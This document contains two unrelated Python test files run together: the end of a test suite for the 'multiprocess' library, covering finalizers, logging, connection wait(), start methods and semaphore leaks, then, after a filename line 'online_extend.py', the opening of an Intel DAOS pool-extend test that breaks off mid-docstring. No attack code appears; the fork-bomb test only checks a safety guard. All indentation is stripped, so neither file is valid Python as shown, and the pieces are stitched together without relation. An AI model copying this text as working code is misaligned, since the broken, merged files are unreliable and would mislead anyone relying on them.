class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocess.' + m for m in modules]
modules.remove('multiprocess.__init__')
modules.append('multiprocess')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocess.popen_fork')
modules.remove('multiprocess.popen_forkserver')
modules.remove('multiprocess.popen_spawn_posix')
else:
modules.remove('multiprocess.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocess.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocess.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.daemon = True
p.start()
self.assertEqual(LEVEL1, reader.recv())
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.daemon = True
p.start()
self.assertEqual(LEVEL2, reader.recv())
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process(q):
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=_test_process, args=(queue,))
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocess.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocess.connection import wait
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocess.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.time()
res = wait([a, b], expected)
delta = time.time() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.time()
res = wait([a, b], 20)
delta = time.time() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocess.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.time()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.time() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocess.connection import wait
a, b = multiprocessing.Pipe()
t = time.time()
res = wait([a], timeout=-1)
t = time.time() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def _test_flags(self):
import json, subprocess
# start child process using unusual flags
prog = ('from multiprocess.tests import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
p.join(10)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def _test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recurisvely start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
p.join(timeout=5)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
p.join(timeout=5)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
p.join(timeout=5)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x'*(1024*1024)) # sending 1 MB should block
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def _test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x'*(1024*1024))
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
#
# Check that killing process does not leak named semaphores
#
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestSemaphoreTracker(unittest.TestCase):
def test_semaphore_tracker(self):
import subprocess
cmd = '''if 1:
import multiprocess as mp, time, os
mp.set_start_method("spawn")
lock1 = mp.Lock()
lock2 = mp.Lock()
os.write(%d, lock1._semlock.name.encode("ascii") + b"\\n")
os.write(%d, lock2._semlock.name.encode("ascii") + b"\\n")
time.sleep(10)
'''
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-c', cmd % (w, w)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_multiprocessing.sem_unlink(name1)
p.terminate()
p.wait()
time.sleep(2.0)
with self.assertRaises(OSError) as ctx:
_multiprocessing.sem_unlink(name2)
# docs say it should be ENOENT, but OSX seems to give EINVAL
self.assertIn(ctx.exception.errno, (errno.ENOENT, errno.EINVAL))
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = 'semaphore_tracker: There appear to be 2 leaked semaphores'
self.assertRegex(err, expected)
self.assertRegex(err, 'semaphore_tracker: %r: \[Errno' % name1)
#
# Mixins
#
class ProcessesMixin(object):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(object):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
t = 0.01
while len(multiprocessing.active_children()) > 1 and t < 5:
time.sleep(t)
t *= 2
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
print('Shared objects which still exist at manager shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
class ThreadsMixin(object):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
time.sleep(0.5)
multiprocessing.process._cleanup()
gc.collect()
tmp = set(multiprocessing.process._dangling) - set(dangling[0])
if tmp:
print('Dangling processes:', tmp, file=sys.stderr)
del tmp
tmp = set(threading._dangling) - set(dangling[1])
if tmp:
print('Dangling threads:', tmp, file=sys.stderr)
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
online_extend.py
|
#!/usr/bin/python
"""
(C) Copyright 2020-2021 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
import time
import threading
from test_utils_pool import TestPool
from write_host_file import write_host_file
from daos_racer_utils import DaosRacerCommand
from dmg_utils import check_system_query_status
from osa_utils import OSAUtils
from apricot import skipForTicket
from daos_utils import DaosCommand
class OSAOnlineExtend(OSAUtils):
# pylint: disable=too-many-ancestors
"""
Test Class Description: This test runs
daos_server Online Extend test cases.
:avocado: recursive
"""
def setUp(self):
"""Set up for test case."""
super().setUp()
self.dmg_command = self.get_dmg_command()
self.daos_command = DaosCommand(self.bin)
self.ior_test_sequence = self.params.get(
"ior_test_sequence", '/run/ior/iorflags/*')
self.test_oclass = self.params.get("oclass", '/run/test_obj_class/*')
self.ranks = self.params.get("rank_list", '/run/test_ranks/*')
# Start an additional server.
self.extra_servers = self.params.get("test_servers",
"/run/extra_servers/*")
# Recreate the client hostfile without slots defined
self.hostfile_clients = write_host_file(
self.hostlist_clients, self.workdir, None)
self.pool = None
self.dmg_command.exit_status_exception = True
self.daos_racer = None
def daos_racer_thread(self):
"""Start the daos_racer thread."""
self.daos_racer = DaosRacerCommand(self.bin, self.hostlist_clients[0],
self.dmg_command)
self.daos_racer.get_params(self)
self.daos_racer.set_environment(
self.daos_racer.get_environment(self.server_managers[0]))
self.daos_racer.run()
def run_online_extend_test(self, num_pool, racer=False,
oclass=None, app_name="ior"):
"""Run the Online extend without data.
Args:
num_pool(int) : total pools to create for testing purposes.
racer(bool) : Run the testing along with daos_racer.
Defaults to False.
oclass(str) : Object Class (eg: RP_2G1, etc). Default to None.
app_name(str) : App (ior or mdtest) to run during the testing.
Defaults to ior.
"""
# Pool dictionary
pool = {}
if oclass is None:
oclass = self.ior_cmd.dfs_oclass.value
test_seq = self.ior_test_sequence[0]
# Start the daos_racer thread
if racer is True:
daos_racer_thread = threading.Thread(target=self.daos_racer_thread)
daos_racer_thread.start()
time.sleep(30)
for val in range(0, num_pool):
pool[val] = TestPool(
context=self.context, dmg_command=self.get_dmg_command(),
label_generator=self.label_generator)
pool[val].get_params(self)
pool[val].create()
pool[val].set_property("reclaim", "disabled")
# Extend the pool_uuid, rank and targets
for val in range(0, num_pool):
threads = []
self.pool = pool[val]
# Start the additional servers and extend the pool
self.log.info("Extra Servers = %s", self.extra_servers)
self.start_additional_servers(self.extra_servers)
if self.test_during_aggregation is True:
for _ in range(0, 2):
self.run_ior_thread("Write", oclass, test_seq)
self.delete_extra_container(self.pool)
# The following thread runs while performing osa operations.
if app_name == "ior":
threads.append(threading.Thread(target=self.run_ior_thread,
kwargs={"action": "Write",
"oclass": oclass,
"test": test_seq}))
else:
threads.append(threading.Thread(target=self.run_mdtest_thread))
# Make sure system map has all ranks in joined state.
for retry in range(0, 10):
scan_info = self.get_dmg_command().system_query()
if not check_system_query_status(scan_info):
if retry == 9:
self.fail("One or more servers not in expected status")
else:
break
# Launch the IOR or mdtest thread
for thrd in threads:
self.log.info("Thread : %s", thrd)
thrd.start()
time.sleep(1)
self.pool.display_pool_daos_space("Pool space: Beginning")
pver_begin = self.get_pool_version()
self.log.info("Pool Version at the beginning %s", pver_begin)
output = self.dmg_command.pool_extend(self.pool.uuid, self.ranks)
self.print_and_assert_on_rebuild_failure(output)
pver_extend = self.get_pool_version()
self.log.info("Pool Version after extend %s", pver_extend)
# Check pool version incremented after pool exclude
self.assertTrue(pver_extend > pver_begin,
"Pool Version Error: After extend")
# Wait to finish the threads
for thrd in threads:
thrd.join()
if not self.out_queue.empty():
self.assert_on_exception()
# Check data consistency for IOR in future
# Presently, we are running daos_racer in parallel
# to IOR and checking the data consistency only
# for the daos_racer objects after exclude
# and reintegration.
if racer is True:
daos_racer_thread.join()
for val in range(0, num_pool):
display_string = "Pool{} space at the End".format(val)
self.pool = pool[val]
self.pool.display_pool_daos_space(display_string)
self.run_ior_thread("Read", oclass, test_seq)
self.container = self.pool_cont_dict[self.pool][0]
kwargs = {"pool": self.pool.uuid,
"cont": self.container.uuid}
output = self.daos_command.container_check(**kwargs)
self.log.info(output)
@skipForTicket("DAOS-7195,DAOS-7955")
def test_osa_online_extend(self):
"""Test ID: DAOS-4751
Test Description: Validate Online extend with checksum
enabled.
:avocado: tags=all,pr,daily_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_extend,online_extend,online_extend_with_csum
"""
self.log.info("Online Extend : With Checksum")
self.run_online_extend_test(1)
@skipForTicket("DAOS-7195,DAOS-7955")
def test_osa_online_extend_without_checksum(self):
"""Test ID: DAOS-6645
Test Description: Validate Online extend without checksum enabled.
:avocado: tags=all,pr,daily_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_extend,online_extend,online_extend_without_csum
